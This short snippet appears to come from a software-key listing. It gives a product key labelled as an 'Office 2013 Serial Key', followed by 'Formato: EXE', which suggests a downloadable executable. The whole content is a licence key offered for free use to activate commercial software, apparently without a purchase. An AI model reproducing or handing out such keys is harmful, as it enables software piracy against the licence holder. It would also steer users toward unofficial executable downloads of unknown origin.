Office 2013 Serial Key-03 ( MT7NR-6GWBK-QGHBV-2YBFG-72V28 )

Formato: EXE